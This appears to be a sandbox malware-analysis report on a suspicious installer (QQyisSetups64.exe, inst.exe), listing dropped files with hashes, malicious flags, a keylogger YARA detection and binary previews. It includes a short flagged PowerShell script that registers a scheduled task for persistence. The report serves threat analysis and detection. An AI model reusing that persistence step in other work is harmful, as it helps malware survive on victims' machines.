Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fajelykl.uwx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtxrbs5i.uns.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\{4CFE9941-4698-4699-A247-0D1E422E339F}.tmp

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	PNG image data, 600 x 380, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	16151
Entropy (8bit):	7.9414528437087935
Encrypted:	false
SSDEEP:	384:9SmRt7jn8csHkzjhJuCwQ19rtw5srwat0ADwP0F43ec1:dt7bjsHkBwCwseat0AkdOc1
MD5:	3641846128E0A27A28CA0DBA8942B896
SHA1:	88C40C9923AB48E0C01883A773E297541CE49882
SHA-256:	CBF7CD45FE193E0A438CE14B0176077762E984F897091A682F9E866983DA9174
SHA-512:	15910E5A279F17EA06618CB8DCBB64FE8F8E6F5061FC14BCA6A92FF2795CF64EACEB2067104358A014079550CA1B4F24200935E2F10B1EDE6622D94794047550
Malicious:	false
Preview:	.PNG........IHDR...X...\|.....$m5S...GPLTE..q..q..r....v..#.....(.~+.1...w>...q..q.....r$.v".u..t..t..s..w(.w..q........}.y..{..'.y-.y#.y1.z.....w..y6.\|..{......t....x .".\|'...~-.},.:.!.".%.$.(..9.}=.}%.\|./.{J.C.A.?.\|+.D.0.2.2.~)...,.0.~?.?...~I.).1.x".'.\|G.5.8.{N.Q.G.J.R.Q.Z.5.:.Y.Y.U..X1...M..Hc.i..\H.q..Tv.h...a....tRNS..f..f.f........hE..=pIDATx..m..`.....0..@.)q3.P.A...XDH.Q79_...B..=_;....o.i.r....q].u.....I..........w4.._..wv...E.Vs....x..v.O...>.Z......kw^...O.`..Hb........_. h.t_t:mM.b. 8@...%.)^...i.C....<...:.:a..~....... ..\|....Y.l5....`&...-'..-.......&".#....ZB,..VL..../.B,.V.V.W\|.Za......CZ.X\.....aT...x".w.}#.bu$.,K.....U.Y..j..U.AQ....W...{u~.....T..agf..:^f./O,.3.g..J"k^.Y....W..z'..T8<.b..ZA..................f....,*.n`Y.ld.b.K.KDV..b..S.%..F.h.O.WAEd).....#..5`^.D..Y........2&....S..S..Ax.W'....f.....+....]..}.ZQ.d..3...m.3...}.~......C..v.Y.b.........X,...l.1.)N.Y....[.....b=...=.

C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704608
Entropy (8bit):	6.625840358726942
Encrypted:	false
SSDEEP:	12288:1IhyxJ3BYXF6WxYC2aeHACRYlH+ZOAyTjUnIgidGtAd8Rwb33+YnBsLS683wK9T7:ih8WxYCyYlaOYnliItjRwbH+YBsLS68N
MD5:	D875875EB3282B692AB10E946EA22361
SHA1:	34BCEF8A8CB0E1DB44671892AC3CBD74D3C541A8
SHA-256:	0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
SHA-512:	972466310D3C145141320584B5F3E431C6888BDA2BA1036F85E68E534ED6FB97BA04CBD46D8D9C401DC5857100DC1BFF1BAD82B50514F3E5C582522F22FD2B5C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: wyySetups64.exe, Detection: malicious, Browse Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........nl..nl..nl..I..ol...s..fl..p>'.kl...#5.kl..g.6.Ol..g..el..I..ql..nl...m..g. ..l..g.'..l..g.1.ol..p>7.ol..nl4.ll..g.2.ol..Richnl..................PE..L......Z...........!......................................................................@..............................................................5......LS...................................................................................text............................... ..`.rdata..w...........................@..@.data...`........4..................@....rsrc...............................@..@.reloc..`p.......r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{8796FA3A-41C5-4c58-BB9B-87B55292AAE6}.tmp

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
Category:	dropped
Size (bytes):	304652
Entropy (8bit):	7.999195439763513
Encrypted:	true
SSDEEP:	6144:dl5TTOp1tnABtoSIkutXiC3NxDPYhroRN6AxPM1CKSNEZ4:1TmTAB+XddZAahrKGT
MD5:	8039C279A02FEA0387E8D51BDDE541D5
SHA1:	A6A52EF6C01FDE3A1A1C702C41777119DBDB203A
SHA-256:	0BA9A3E6E4B89ED8C30C092845ECAB5939AFE4C701A130FDC6ECC9D0EC1A8386
SHA-512:	97F45BF13FF85AD252B46C8E62D2D114E84B3AEF17AA2E3B21CE47B41B416D2000506EE9BFABBC055295817CE6D7D9771A038ACFAE514CCA852EF861751C7254
Malicious:	false
Preview:	MSCF............,...............(...H.......`..........L.z .360P2SP.dll.h..G.G..[...3.@..."R`4..m....mnu..e.r.\.K.J.....u.Pw..9f..u..H..?7.=z."\|..^ ...].fi.r...........biw.Se6".p......;N....o.rI.x...$.IN.><...o......[6.k.[.lRvl..zK.{v.kKh6!36kOi..6.3Z.`.6+.B..c.t2.B)Zq.3$..V.@w......... T..4DWF.`.W..~.<.....73o7&7.L..5....rF....E.....~.@.@{...B~~.ho.D..X..pH+.. ..}-BMrx.".dU....e".nk.D...................L..e...L..~3E.......H.r..6m.G.o..z...g......}....zT.[-.K.{.\......W?..}.^....<.z.W.y.i.z&....@.-..AJN9.[.J.]Z.....k...+.2....M.........H.H...E"....`.....p.,>Q.....D.....>.B.{..t;bw..hb.....dW8.....eH2.l....^...KyD.Z.`I.........^W..k.$..;n.I..&.>s.8..WF...}......W)...:.-Sp<m..:\..U..]JT....Kw.(.......x.:.-..C..e..a..... {...!Y./1.MnF..05...9......}...+WR8W.z...fe...+..s5.....E.6w.rzP.&..Ii...h.....L$....Z~.}N...W9.6pMt4.f..R...RL.........CH:.Q.-a1... ........Y.......P..B.:M.........l.w..Xn.....VN...7FkG...3...H....i.C..`q4.Q.&.9.X...^.p/.K.(....

C:\Users\user\AppData\Local\Temp\{939E192B-95AD-4c61-BAEB-66F162E25721}.tmp

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	PNG image data, 491 x 161, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1556
Entropy (8bit):	7.507131051649285
Encrypted:	false
SSDEEP:	24:LZwmgblk3k44Yo4bo4Y4ofXQLo4LoXgMXI7gAgXILs/fHAnzPCpdyIIMGb34oYYI:OpO0P3nfXfX/HXPX/HXai+MGb34Z
MD5:	402C9D31E2079948E743562CB48AF2A6
SHA1:	5111E39A19E0675A44369E03D4A82132F0D12977
SHA-256:	D82DF7AFA80AB17CF1D298488C66902F192034B6BB18176F5BD5C5B74E348E79
SHA-512:	27510489FAA6562507CBDB0B5F545D9124D6BA59D41A65224DD6089A9C8331279CE83905B26D41453255BDA660FBAAE957E0E17D43350DFCB86603888177C760
Malicious:	false
Preview:	.PNG........IHDR..............g-....pHYs...........~.... cHRM..z%..............u0...`..:....o._.F....PLTE.................................................................................................................................................................................;;;<<<===>>>???@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbcccdddeeefffggghhhiiijjjkkklllmmmnnnooopppqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{\|\|\|}}}~~~...................................................................................................................................................................................................................................................................................................................................................................................................B.F.....IDATx...[s.D....-.d.%...L...r*.8.....9.pC...d.g.HQf<..7.o....ju.Z.V.n9.[...u......w9wo.[./....U^....9or

C:\Users\user\AppData\Local\Temp\{A161C916-3730-49ee-83E0-3AC161379AC4}.tmp

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	PNG image data, 604 x 380, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	14344
Entropy (8bit):	7.934027356242661
Encrypted:	false
SSDEEP:	384:QTbAFSIp6FghLfaAEYlYifrkou/Z1DTn8O5zV7qh:QTkoIp68SW1Tk1Z1P8O5zch
MD5:	10AF715DFB97B8A187F81555C8E6068B
SHA1:	C108E08D53A6EC711F1BA70FDBD7561CE483CBCD
SHA-256:	EE7F804A1C73B6D6935FF731AE87AEFBBD1ABE16DC5FF315C5D8D91E283C902D
SHA-512:	FDCA596438FDD60C88DE69367ABC70D6CBFF318D8381EB4155FA257690F26D95C9A13131F676654BED27BE458A6DF67CBE1D713DE9826CF955723F6A92FC5BBB
Malicious:	false
Preview:	.PNG........IHDR...\...\|.....-..)...>PLTE..q..q..s....v....x..!.1.+.+.%...\|..q..r!.u$.v..t..s..t..r&.v..w+.x....z..'.x..}../.y......w..z5.{..t.{..9.}..(.~..}#.\|..".#.%......~>.). ...\|&.1.}....{+.!.y0.B.~F..=..B.6.zG.6.3.C.}:.2.~R.-.'.\|B..L.K.O.=.\|#.yF.".R..N.X.I.._./.xZ.,.wI..1.T.5.?...X..M..H=.w.bY.j..Vu.7....tRNS..e..e.e......2....6kIDATx...k..@..`...~.P.(j.b.%...W..EX.A.,........{.7.I3Y5......D}...i...8..`..~...W.En^8.jr..+....k... w.9.s....r....\.{-./].r.Q9...9.X.O&O..~........z]&...D.T..<\|..e)/^.....X..p....\|..Jd!.....7o..,...WX.....rV.../...Wo.{...K.2.U.G....4H.......y9d..q!=..i\.t5....",.r.....G.r....&....lI.<....z\N.<L./.k.....B...k.U\./.t......../.7...U.+(]#.@R...V.q.g.&I.i.-d...v..-.2..a.W..LY.jl.,.B_..i..y..B....Y....K....+,]...,,..6......?..l..:#.xg.-..[o...m.WH+......E\.e\|....K./...Z1]J.f.vq.Z.......u...+........[O..._..-^..E^r0.{.l.+O.FK........^...3..\|]z\u.......b...VW..R.n..@...*w.q

C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1469440
Entropy (8bit):	6.242110984104102
Encrypted:	false
SSDEEP:	24576:l4LEubC/9euoUCi82BbjSyM5hGfzmzJHXW+U0:UEubUo1i3eymhGfizJHK0
MD5:	A2FF2C72E739E0CF4C73B623444CA39D
SHA1:	FF886E63C894A20F30C136A8264CFA33D41B8331
SHA-256:	C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
SHA-512:	844DAB35A1625D5BF1BD814A36FB80D5670D3DFEE5CF65AD8BE53784B486DCC08898B7577A323C7C7E1E83655F861EA86C5453CFA4C3D55353D329EF3AF6320B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: wyySetups64.exe, Detection: malicious, Browse Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......~].:<..:<..:<...s7.<<..3D4..<..3D(.7<......2<..$n%.?<..:<...>......%<......;<..3D"..<..3D%..<..3D3.;<..$n5.;<..:<6.;<..3D0.;<..Rich:<..........................PE..L...0..\...........!.....@...$.......E.......P............................................@.................................<].......`..H-...........4..h7...........X..............................8...@............P..,............................text...f?.......@.................. ..`.rdata...=...P...>...D..............@..@.data...............................@....rsrc...H-...`......................@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\NewInstallAir\NewInstallAir.ui

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1135682
Entropy (8bit):	7.510976265913228
Encrypted:	false
SSDEEP:	12288:Q0+G8ZYG6xrKI/ZFfg5Vfg5nfg53x3mYiJ6YJ6MJ6MEJl:QvGJxuI/bfQVfQnfQ3x3TUbhMl
MD5:	44C8DF596B52856EB1D3FE2E37CBDE4D
SHA1:	4AADBEEF9DC6CD4CCAC758EBDB852915C09545DF
SHA-256:	ECDDA2FB9EB27F1B56349E2ABFE90CE2F8741B982A3DD6D248E7D93E6B75DE2C
SHA-512:	EA94ED1662EFD2F6D91B4D05059DFADD8F290EEDBB45433E33F3B4E3729822A40E0C63D319F2041F3F1738650219200D594CED9E36B558AFF0A494FAB53A0E47
Malicious:	false
Preview:	PK...........Q................DPI_240_Images/PK........0PZU....%...%.......DPI_240_Images/bg_promote.png.PNG........IHDR.............\$......PLTE............U.wh......^.tz..........Ita0bL.?#.?$.A$.G'.P-.S..U0.W0.X1.Y2.Z2.[3.\3.^4._6.a6.d7.g9.j;.m<.o>.q@.tA.vB.yC.\|E..G..I..J..K..L..M..N..O..Q..Q..S.pI.tK.xL.uJ.wJ.yK.zL.\|M.}N..O..M..O.}L.{J.zJ.tH.vI.yJ.\|L.}MD.@..=..?..A..E.G.A.H.-.dG.{[..9.n'.^8.f).Z"{R..O..Q..R..T..W..Y..\".^#.a&.d(.g.k..o...............3&.5'.6(.9.=).9(.9%.<&.=".9..5..1..-..&.....R3.W5.R3.Z6.\9._;.a=.c>.e?.f@.hA.jB.lC.nE.pE.rF.tG.uG.wH(.;<..._C.dD.iF.lJ.qL.uN.xO.\|Q..R..T..V..X..U..R..P..L..K..V..X..Z..[..].._..a.h@.d;.k?.pB.uEq.........>jW(U?.F/.R>.VA.ZB.\E.`F.dG.fI.iJ.egF..%.........}.*...b...........<.~;.\|9.z7.x5.w3.u1.r...U.....k.!mI+sQ...8}\...G.i......q.]R..E.&<.,4.1,.5%.9..D..J..L..L..Y.\|........X.E...T.j.....a.2.^..F..1..............`..A..,..W....y0&$.....IDATx......A..P:@.A......K...$.qwx.T...[...>`...D.oW.'u...?..qy...t...,S.Y..<. M

C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\theme_NewInstallAir.xml

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	28030
Entropy (8bit):	3.581114835224513
Encrypted:	false
SSDEEP:	96:E4EuXYuiODQGYuBRrNRrQRrmRrXejXvXH5CeGTNxyqIYuyLmacwrvlCX4uH3OYqm:6nOT+bO7lU51EHWkGHr
MD5:	8074E9740A0E3CFDA172AD1983C72A05
SHA1:	B6D006ADAFF1FD059268517B6BD5610EF15D3BA9
SHA-256:	E4ED337A562AAC81005D451CFD4AEF721CF067ECBC6D1057601AEFC41EE83E26
SHA-512:	F6680CF19B512060B6ED1C0F88C8EE31A1BE456A37204CB63073E0AC58A2B0F544DCC0DABF0829F28687C2842043D21D41B2F172CB15698316EBF0F2BC89C445
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.t.h.e.m.e.s.>.......<.w.i.n.d.o.w.>.........<.d.e.f.a.u.l.t. .i.c.o.n._.p.o.i.n.t.=.".4.,.4.". .s.h.o.w._.i.c.o.n.=.".0.".>...........<.c.a.n.v.a.s. .n.o.r.m.a.l.=.".0.x.f.f.2.a.b.f.1.d.". .f.i.l.l.=.".0.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.s.k.i.n...p.n.g."./.>...........<.b.o.r.d.e.r. .n.o.r.m.a.l.=.".0.x.f.f.6.3.8.c.3.9.". .w.i.d.t.h.=.".1.". .i.n.n.e.r.=.".0.x.f.f.f.f.f.f.f.f."./.>...........<.f.o.n.t. .b.i.n.d._.f.o.n.t._.b.y._.l.a.n.g.u.a.g.e.=.".0.". .r.e.f.=.".". .f.a.c.e.=.".._o...,..[SO,.T.a.h.o.m.a.". .c.o.l.o.r.=.".0.x.0.0.b.5.e.5.1.3.". .s.i.z.e.=.".8.". .b.o.l.d.=.".0.". .i.t.a.l.i.c.=.".0.". .u.n.d.e.r.l.i.n.e.=.".0."./.>...........<.s.h.a.d.o.w. .b.o.r.d.e.r.=.".5.,.3.,.5.,.7.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.w.i.n.d.o.w._.s.h.a.d.o.w...p.n.g."./.>...........<.c.a.p.t.i.o.n. .s.h.o.w.=.".1.". .h.e.i.g.h.t.=.".3.0.". .c.o.l.o.r.=.".0.x.f.f.2.c.a.6.d.3."./.

C:\Users\user\AppData\Local\Temp\{B27350A0-A91D-4080-9691-C3D734B8F10C}.tmp

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	1346052
Entropy (8bit):	7.9989996832434676
Encrypted:	true
SSDEEP:	24576:S25OCGNlwNr5PL8MqxJTFl9YioVgxuz4Z0dTeLieM1V9QPjQw:B0N2NFL8VB9iiL0dTeOt23
MD5:	4F688C8A30E46A14A868F07E283763F2
SHA1:	BA736A93EF1F07B1C7C24F4201B632F1CB18E73A
SHA-256:	AA02BD7AB8BBF1C1AB138C20D0D7EBB6B5F2E2166E2184405E54D619526E9AC8
SHA-512:	8A1F679BFA7A1D5667FAC931EF9184CBE76E30C26ED1A63E97CE4AFD8815DC1409EDB560EE91FD3DB57AA0BE10D6C567F43FE887440A09897DE09CD8DC7BA88A
Malicious:	false
Preview:	MSCF............,.......................Q....l........~Q.. .sites.dll.~m...l....cV.V .themes\theme_NewInstallAir.xml.BT..~.....cV.V .themes\NewInstallAir\NewInstallAir.ui..e..BJ..CK..\|T..8z..IrH...L`.A..5....8Q..e.0.......4.T1.....'..v..-...V?.Wm...Uk..g2..Bx)...j.L..0..9w.}......w..w..{....k....k....y.nb...p..4.ie..r...?..0....9a.V.x.....p,.}..........<.h...C...#...q.-(u....]7qb....\|..n.y.?.{j.-.9.t.e._F.....s..;.o...+..e.............._.........Gn..[sn6.e.g...V#..j.'.a..8&.y~I,.S.4+...LJf.'O..[.F....).w....ubOf.T...}S!;...D......."......J1.Ma..5...l.T......<....E.._.U..al.....w.......<..H...r......v.............1..o.uz1.......... ./...vE..N..mf...8.Bx..-{.....y.....)....o......z./.....mr.S,-#...9.....]..U....,r.w$`.lH^.R...po...o....8(..6...]..L$. [.~.%...J.V.....).v.s....5..vHu.t....c..z->..y.b..../%..yN+..O.>.ST.."!. dE.T..X..Y.w?........n.Y.-.....:..ZH.}.+..l..-..10..J.bk......~..O.<.k!{.6!Rx..2.8i@[.....S/C....=..:.z..............@....>.

C:\Users\user\AppData\Local\updated.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\QQyisSetups64.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.741657013789009
Encrypted:	false
SSDEEP:	3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
MD5:	AA0E1012D3B7C24FAD1BE4806756C2CF
SHA1:	FE0D130AF9105D9044FF3D657D1ABEAF0B750516
SHA-256:	FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
SHA-512:	15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
Malicious:	true
Preview:	$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath \| Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

C:\Users\user\AppData\Roaming\Logs\QQyisSetups64.log

Download File

Process:	C:\Users\user\AppData\Roaming\QQyisSetups64.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3400
Entropy (8bit):	5.50401446851541
Encrypted:	false
SSDEEP:	96:LbfkSFdMfkMFv3kZFdM3krFMM3krFMM3krF3:/fkSF2fkMFv3kZF23krF13krF13krF3
MD5:	63CAEB8F90F424E56589996FF2091F68
SHA1:	C14096FEF17EE1CF6119809034559BFAE68CD208
SHA-256:	D791441B57E17A290CEABCB0766CA7880C5E079E157CC65443B31A8BC14A2918
SHA-512:	73A98BC2D79CBE171040F38E5D525FA2A7DFB3BB71E6CBB8C72FF0D906365F63D23DC5EC6D8BAE2A829B196F9269D3C3AB3A4B8B05CFC44FB08FFE444C510F09
Malicious:	false
Preview:	----------Raised Exception--------------29/12/2024 05:18:12.864----------------..Exception PID=7892 TID=7896 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)......----------Exception---------------------29/12/2024 05:18:12.864----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7660CC12 PID=7892 TID=7896 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7660CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)....----------Raised Exception--------------29/12/2024 05:18:12.864----------------..Exception PID=7892 TID=7896 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" key.

C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Download File

Process:	C:\Users\user\Desktop\QQyisSetups64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5289240
Entropy (8bit):	7.236599313454909
Encrypted:	false
SSDEEP:	98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
MD5:	B4F00FBA3327488D4CB6FD36B2D567C6
SHA1:	4F0548A2F6BF73A85FF17F40F420098019AC05FF
SHA-256:	D6A84954E038DDF4A0026705E0942FC003CFDC04E58F658A6BD9E89C37C57D18
SHA-512:	C573147ADFEBA7D313CC79498A1C107679F0E69805E3AA8260B3E57DBA282088BCA082536D7866D4708529BF8C3BEF56B2005BD9D59A870E3D29132F6FD3D897
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....R.d..................-...".....D.-.......-...@...........................Q......BQ..........@............................/..?....2.`.............P..)..../.............................../....................../..............................text.....-.......-................. ..`.itext..P.....-.......-............. ..`.data...x.....-.......-.............@....bss.....................................idata...?..../..@..................@....tls........../..........................rdata......../.....................@..@.reloc......../......./.............@..B.rsrc...`.....2.......1.............@..@..............Q.......P.............@..@................................................................................................

C:\Users\user\AppData\Roaming\QQyisSetups64.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\QQyisSetups64.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\Logs\QQyisSetups64.log

Download File

Process:	C:\Users\user\Desktop\QQyisSetups64.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3372
Entropy (8bit):	5.503297144902477
Encrypted:	false
SSDEEP:	96:LWfkSFfHfkMFi3kPFfH3kxFeH3kxFeH3kxF3:yfkSF/fkMFi3kPF/3kxF83kxF83kxF3
MD5:	81D736CF61729F9EF9D17D1DEF998A43
SHA1:	6EBF8913CE90A283AC59CA9C5DEFCA135F6D500F
SHA-256:	6A6556E81134A1BBB09EF3278012B72DAAD469B2A4BB22F7B8DD39CF57D9CEEF
SHA-512:	77A52D175865D6F6D7D14ED27948D3C7A192BD24C02F9AB54A83EF2020FFE3168FCDC8F254A3AF45D85A2FEDC694E34EB8DC9DB26A1E660D0F19F71C8F2A7682
Malicious:	false
Preview:	----------Raised Exception--------------29/12/2024 05:18:09.398----------------..Exception PID=7736 TID=7740 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)......----------Exception---------------------29/12/2024 05:18:09.398----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7660CC12 PID=7736 TID=7740 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7660CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)....----------Raised Exception--------------29/12/2024 05:18:09.398----------------..Exception PID=7736 TID=7740 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" key.

C:\Users\user\Downloads\inst.exe

Download File

Process:	C:\Users\user\Desktop\QQyisSetups64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	4118496
Entropy (8bit):	7.743814085153487
Encrypted:	false
SSDEEP:	98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
MD5:	AAA0F14BDFE3777EEE342C27DE409E6D
SHA1:	6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
SHA-256:	B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
SHA-512:	D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................\|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
